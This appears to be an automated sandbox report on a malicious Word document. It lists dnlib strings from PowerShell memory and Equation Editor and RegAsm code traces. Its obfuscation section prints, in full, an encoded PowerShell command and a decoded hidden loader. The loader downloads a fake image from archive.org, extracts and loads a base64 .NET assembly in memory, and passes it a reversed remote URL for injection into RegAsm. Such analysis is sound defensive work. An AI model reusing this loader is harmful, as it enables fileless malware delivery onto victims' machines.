                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.397342925.0000000006480000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.394834348.00000000033D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: xrrwwstCMd.docxInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005B8F44 push eax; retf 7_2_005B8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005C0F14 push eax; retn 005Bh7_2_005C0F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005C4336 push eax; ret 7_2_005C43FB
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005AF724 push 0000006Eh; ret 7_2_005AF741
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005B01F4 push eax; retf 7_2_005B01F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_005C0F8A push eax; retn 005Bh7_2_005C0F61
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0021591C push 34022060h; iretd 11_2_00215925
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0021255D push ebx; retf 11_2_002125EA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00212D8A pushfd ; ret 11_2_00212D99
